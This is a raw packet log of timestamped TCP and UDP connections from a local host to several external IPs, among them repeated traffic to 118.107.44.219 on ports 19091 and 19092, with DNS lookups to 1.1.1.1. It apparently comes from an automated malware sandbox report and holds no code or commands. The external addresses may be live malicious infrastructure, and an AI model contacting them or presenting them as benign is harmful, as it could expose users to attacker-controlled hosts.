                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.611296892 CET804975639.156.85.200192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.611356974 CET4975680192.168.2.739.156.85.200
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.647423983 CET4975680192.168.2.739.156.85.200
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.650327921 CET4976780192.168.2.739.156.85.200
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.706726074 CET804976639.156.85.201192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.706804037 CET4976680192.168.2.739.156.85.201
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.726478100 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.726819992 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.769639015 CET804976739.156.85.200192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.769710064 CET4976780192.168.2.739.156.85.200
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.770612955 CET4976780192.168.2.739.156.85.200
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.846048117 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.871187925 CET4975780192.168.2.739.156.85.231
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.871512890 CET4975880192.168.2.739.156.85.201
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.871826887 CET4976580192.168.2.739.156.85.231
                                                                                                                                                                                                                    Dec 29, 2024 11:18:37.872353077 CET4976680192.168.2.739.156.85.201
                                                                                                                                                                                                                    Dec 29, 2024 11:18:38.581141949 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:38.584850073 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:38.700449944 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:38.704130888 CET8049748171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.146619081 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.146678925 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.183748007 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.303018093 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.654844999 CET8049748171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.654922009 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.747613907 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:39.747802019 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:49.542732000 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:49.654419899 CET8049748171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:49.654469967 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:49.662964106 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:49.748236895 CET8049738171.8.167.90192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:49.748517036 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:18:50.086167097 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:50.136195898 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:50.193794012 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:18:50.313149929 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:06.839476109 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:06.958842993 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:07.382227898 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:07.433094025 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:07.462456942 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:07.581758022 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:23.449229956 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:23.568701982 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:23.991885900 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:24.042571068 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:24.079332113 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:24.198617935 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.214553118 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.333853960 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.756829023 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.823864937 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.910099983 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.029566050 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:56.684322119 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:56.688442945 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:56.803872108 CET1909149736118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:56.803944111 CET4973619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:58.840095997 CET4994919092192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:19:58.999528885 CET1909249949118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:58.999638081 CET4994919092192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:06.528114080 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:06.528260946 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:06.886543036 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:06.926266909 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:06.930882931 CET4994919092192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.050371885 CET1909249949118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.050384045 CET1909249949118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.050479889 CET1909249949118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.050489902 CET1909249949118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.589617014 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.620985031 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.679193020 CET1909249949118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.679450035 CET4994919092192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:07.798728943 CET1909249949118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:08.824029922 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:08.886506081 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:11.226471901 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:11.386545897 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:16.120913029 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:16.199110985 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:22.105398893 CET4994919092192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:22.105448008 CET4994919092192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:22.224776030 CET1909249949118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:22.224844933 CET4994919092192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:24.043499947 CET4999619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:24.162883043 CET1909149996118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:24.162978888 CET4999619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:25.730345964 CET4974880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:25.808459044 CET4973880192.168.2.7171.8.167.90
                                                                                                                                                                                                                    Dec 29, 2024 11:20:28.729831934 CET4999619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:28.849347115 CET1909149996118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:28.849433899 CET1909149996118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:28.849452972 CET1909149996118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:28.849545002 CET1909149996118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:29.277762890 CET1909149996118.107.44.219192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:20:29.278063059 CET4999619091192.168.2.7118.107.44.219
                                                                                                                                                                                                                    Dec 29, 2024 11:20:29.397393942 CET1909149996118.107.44.219192.168.2.7
                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                    Dec 29, 2024 11:18:14.794842958 CET5777653192.168.2.71.1.1.1
                                                                                                                                                                                                                    Dec 29, 2024 11:18:15.085813046 CET53577761.1.1.1192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.285932064 CET6549153192.168.2.71.1.1.1
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.423779011 CET53654911.1.1.1192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.708944082 CET5381753192.168.2.71.1.1.1
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.823026896 CET5306453192.168.2.71.1.1.1
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.825977087 CET6164053192.168.2.71.1.1.1
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.960895061 CET53530641.1.1.1192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:30.964226961 CET53616401.1.1.1192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.014172077 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.252985954 CET53538171.1.1.1192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.302263021 CET184343478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.302263021 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.302318096 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.380242109 CET184343478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.380279064 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.380279064 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.747203112 CET184343478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.747239113 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.747252941 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.902019024 CET184343478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.902036905 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:31.902048111 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.213383913 CET184343478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.213413000 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.213413000 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.448812962 CET184343478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.448848963 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.448848963 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.651359081 CET3478184341.192.136.170192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.651408911 CET3478184341.192.136.170192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.651438951 CET3478184341.192.136.170192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.651473999 CET3478184341.192.136.170192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.668854952 CET184343478192.168.2.71.192.136.171
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.669101000 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.669128895 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.669162989 CET1843433500192.168.2.78.46.123.189
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.787817001 CET3478184341.192.136.170192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.886363029 CET184343478192.168.2.71.192.136.171
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.886388063 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.886394978 CET1843433500192.168.2.78.46.123.189
                                                                                                                                                                                                                    Dec 29, 2024 11:18:32.886388063 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.021941900 CET3478184341.192.136.170192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.105129004 CET184343478192.168.2.71.192.136.171
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.105142117 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.105169058 CET1843433500192.168.2.78.46.123.189
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.105175972 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.324851036 CET184343478192.168.2.71.192.136.171
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.324882984 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.324907064 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.324943066 CET1843433500192.168.2.78.46.123.189
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.543071032 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.543071032 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.543104887 CET184343478192.168.2.71.192.136.171
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.543104887 CET1843433500192.168.2.78.46.123.189
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.771950960 CET184343478192.168.2.71.192.136.171
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.771996021 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.772032022 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.772049904 CET1843433500192.168.2.78.46.123.189
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.982098103 CET184343478192.168.2.71.192.136.171
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.982326984 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.982351065 CET184353478192.168.2.71.192.136.170
                                                                                                                                                                                                                    Dec 29, 2024 11:18:33.982371092 CET1843433500192.168.2.78.46.123.189
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.052949905 CET3478184341.192.136.171192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.052964926 CET3478184341.192.136.171192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.052983046 CET3478184341.192.136.171192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.052994013 CET3478184341.192.136.171192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.123660088 CET3478184341.192.136.171192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.203797102 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.308515072 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.359668970 CET3478184341.192.136.171192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.461070061 CET5590053192.168.2.71.1.1.1
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.464617014 CET6456353192.168.2.71.1.1.1
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.567869902 CET3478184341.192.136.171192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.800470114 CET80100071.192.136.135192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:34.904946089 CET80100071.192.136.135192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.073961020 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.147690058 CET53559001.1.1.1192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.464500904 CET6456353192.168.2.71.1.1.1
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.671084881 CET80100071.192.136.135192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874721050 CET53645631.1.1.1192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:18:35.874813080 CET53645631.1.1.1192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:14.340075970 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:29.761552095 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:33.917881966 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:34.136733055 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:34.355468988 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:34.574125051 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:34.733311892 CET80100071.192.136.135192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:34.947961092 CET80100071.192.136.135192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:35.574991941 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.217633963 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.433448076 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.543011904 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.543041945 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.652201891 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.652430058 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.761574984 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.761662960 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.871150970 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.871237993 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.981853962 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:36.981897116 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.089606047 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.089637995 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.199052095 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.199081898 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.308470964 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.308507919 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.417793036 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.417844057 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.527257919 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.527261972 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.638695955 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.638984919 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.745913982 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.746198893 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.855292082 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.855396986 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.964695930 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:37.964931011 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.074027061 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.074101925 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.183363914 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.183475971 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.184020042 CET80100071.192.136.134192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.293622017 CET80100071.192.136.134192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.298804045 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.298821926 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.402055979 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.402235985 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.402440071 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.405172110 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.511539936 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.511576891 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.520725012 CET80100071.192.136.132192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.621062994 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.621490002 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.630103111 CET80100071.192.136.132192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.651401043 CET80100071.192.136.134192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.729078054 CET80100071.192.136.134192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.729520082 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.730498075 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.730537891 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.839631081 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.839826107 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.845509052 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.948970079 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:38.949157000 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.058763981 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.059039116 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.061594009 CET80100071.192.136.134192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.070789099 CET80100071.192.136.132192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.167797089 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.167824984 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.171282053 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.277153969 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.277187109 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.296783924 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.386480093 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.386609077 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.395955086 CET80100071.192.136.132192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.495898962 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.496084929 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.504795074 CET80100071.192.136.132192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.605243921 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.605412006 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.608352900 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.714673042 CET1000780192.168.2.71.192.136.135
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.714812040 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.719851017 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.824254990 CET1000780192.168.2.71.192.136.132
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.824400902 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.934007883 CET1000780192.168.2.71.192.136.134
                                                                                                                                                                                                                    Dec 29, 2024 11:19:39.934111118 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.042800903 CET80100071.192.136.133192.168.2.7
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.043741941 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.152168036 CET1000780192.168.2.71.192.136.133
                                                                                                                                                                                                                    Dec 29, 2024 11:19:40.152203083 CET1000780192.168.2.71.192.136.135
